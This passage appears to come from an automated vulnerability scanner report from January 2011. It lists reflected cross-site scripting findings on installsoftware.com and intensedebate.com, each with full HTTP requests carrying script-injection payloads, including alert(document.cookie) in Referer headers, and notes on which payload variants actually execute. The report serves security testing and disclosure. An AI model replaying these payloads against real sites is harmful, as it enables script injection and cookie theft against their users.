<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js5fe6b\"><script>alert(1)</script>4303ea7f066/rokmoomenu.js" type="hidden" />
...[SNIP]...

1.263. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836bc"><script>alert(1)</script>de7ab0e4247 was submitted in the REST URL parameter 5. This input was echoed as 836bc\"><script>alert(1)</script>de7ab0e4247 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js836bc"><script>alert(1)</script>de7ab0e4247 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:44 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js836bc\"><script>alert(1)</script>de7ab0e4247" type="hidden" />
...[SNIP]...

1.264. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3993"><script>alert(1)</script>5d956443ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3993\"><script>alert(1)</script>5d956443ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js?e3993"><script>alert(1)</script>5d956443ee4=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:51 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js?e3993\"><script>alert(1)</script>5d956443ee4=1" type="hidden" />
...[SNIP]...

1.265. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d593"><script>alert(1)</script>62b4e4256f9 was submitted in the REST URL parameter 1. This input was echoed as 1d593\"><script>alert(1)</script>62b4e4256f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content1d593"><script>alert(1)</script>62b4e4256f9/themes/rt_mynxx_wp/js/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content1d593\"><script>alert(1)</script>62b4e4256f9/themes/rt_mynxx_wp/js/rokutils.js" type="hidden" />
...[SNIP]...

1.266. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fabc"><script>alert(1)</script>6b5f665f875 was submitted in the REST URL parameter 2. This input was echoed as 8fabc\"><script>alert(1)</script>6b5f665f875 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes8fabc"><script>alert(1)</script>6b5f665f875/rt_mynxx_wp/js/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes8fabc\"><script>alert(1)</script>6b5f665f875/rt_mynxx_wp/js/rokutils.js" type="hidden" />
...[SNIP]...

1.267. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f2e"><script>alert(1)</script>3dcf2e39ba4 was submitted in the REST URL parameter 3. This input was echoed as 13f2e\"><script>alert(1)</script>3dcf2e39ba4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp13f2e"><script>alert(1)</script>3dcf2e39ba4/js/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp13f2e\"><script>alert(1)</script>3dcf2e39ba4/js/rokutils.js" type="hidden" />
...[SNIP]...

1.268. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f9d2"><script>alert(1)</script>e2665a0633f was submitted in the REST URL parameter 4. This input was echoed as 6f9d2\"><script>alert(1)</script>e2665a0633f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js6f9d2"><script>alert(1)</script>e2665a0633f/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:37 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js6f9d2\"><script>alert(1)</script>e2665a0633f/rokutils.js" type="hidden" />
...[SNIP]...

1.269. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e316"><script>alert(1)</script>78d1f3e19ac was submitted in the REST URL parameter 5. This input was echoed as 5e316\"><script>alert(1)</script>78d1f3e19ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokutils.js5e316"><script>alert(1)</script>78d1f3e19ac HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js5e316\"><script>alert(1)</script>78d1f3e19ac" type="hidden" />
...[SNIP]...

1.270. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f0d"><script>alert(1)</script>e67ab689e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4f0d\"><script>alert(1)</script>e67ab689e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokutils.js?d4f0d"><script>alert(1)</script>e67ab689e6=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:31 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js?d4f0d\"><script>alert(1)</script>e67ab689e6=1" type="hidden" />
...[SNIP]...

1.271. http://www.installsoftware.com/xmlrpc.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cecc3"><script>alert(1)</script>b9fb98d0eae was submitted in the REST URL parameter 1. This input was echoed as cecc3\"><script>alert(1)</script>b9fb98d0eae in the application's response.

As in 1.270, the backslash before the echoed quote is ineffective in an HTML attribute: the quote still terminates the value and the <script> element that follows is parsed as markup. Only HTML entity encoding of the reflected URL closes this off.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlrpc.phpcecc3"><script>alert(1)</script>b9fb98d0eae HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44483

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/xmlrpc.phpcecc3\"><script>alert(1)</script>b9fb98d0eae" type="hidden" />
...[SNIP]...

1.272. http://www.intensedebate.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intensedebate.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9021'><script>alert(1)</script>47ba7e7544c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

Caveat on the proof of concept: the attribute is the src of a <script> element that loads its code from wordpress.com, and the request URL is placed unencoded into that URL's back parameter. The injected '> closes the start tag, so the reflected <script>alert(1)</script> becomes the inline text of an element that already has a src attribute, which browsers do not execute, and its </script> merely closes that element. The payload as written is therefore not expected to fire. A payload that closes the element first, such as '></script><script>alert(1)</script>, lands in a fresh script element and does. The finding itself is unaffected: attacker-controlled data is written unencoded into a script src attribute.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c9021'><script>alert(1)</script>47ba7e7544c=1 HTTP/1.1
Host: www.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 19:48:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 19660

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/?c9021'><script>alert(1)</script>47ba7e7544c=1'>
...[SNIP]...

1.273. http://www.intensedebate.com/js/genericCommentWrapperV2.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intensedebate.com
Path:   /js/genericCommentWrapperV2.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 773e4'><script>alert(1)</script>7211233d828 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

Same context as 1.272: the reflection sits in the src attribute of a <script> element, so the payload's <script>alert(1)</script> becomes the ignored inline body of that element and does not execute as written; a payload that first closes the element with '></script> does. Note also that a request for a .js path is answered with a full text/html page.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/genericCommentWrapperV2.js773e4'><script>alert(1)</script>7211233d828 HTTP/1.1
Host: www.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:16:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4723

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/genericCommentWrapperV2.js773e4'><script>alert(1)</script>7211233d828'>
...[SNIP]...

1.274. http://www.intensedebate.com/themes/chameleon/css/idcCSS.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intensedebate.com
Path:   /themes/chameleon/css/idcCSS.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fc43a'><script>alert(1)</script>5735b3b8c78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

Same context as 1.272: the reflection sits in the src attribute of a <script> element, so the payload's <script>alert(1)</script> becomes the ignored inline body of that element and does not execute as written; a payload that first closes the element with '></script> does.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/chameleon/css/idcCSS.phpfc43a'><script>alert(1)</script>5735b3b8c78?acctid=22911&browser=safari HTTP/1.1
Host: www.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:16:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4748

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/themes/chameleon/css/idcCSS.phpfc43a'><script>alert(1)</script>5735b3b8c78?acctid=22911&browser=safari'>
...[SNIP]...

1.275. http://www.intensedebate.com/themes/chameleon/css/idcCSS.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intensedebate.com
Path:   /themes/chameleon/css/idcCSS.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd316'><script>alert(1)</script>69b478ffdd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

Same context as 1.272: the reflection sits in the src attribute of a <script> element, so the payload's <script>alert(1)</script> becomes the ignored inline body of that element and does not execute as written; a payload that first closes the element with '></script> does.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/chameleon/css/idcCSS.php/cd316'><script>alert(1)</script>69b478ffdd7 HTTP/1.1
Host: www.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 19:48:04 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4817

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/themes/chameleon/css/idcCSS.php/cd316'><script>alert(1)</script>69b478ffdd7'>
...[SNIP]...

1.276. http://www.intensedebate.com/wCSS.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intensedebate.com
Path:   /wCSS.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 789e9'><script>alert(1)</script>85dc5a2562a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

Same context as 1.272: the reflection sits in the src attribute of a <script> element, so the payload's <script>alert(1)</script> becomes the ignored inline body of that element and does not execute as written; a payload that first closes the element with '></script> does.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

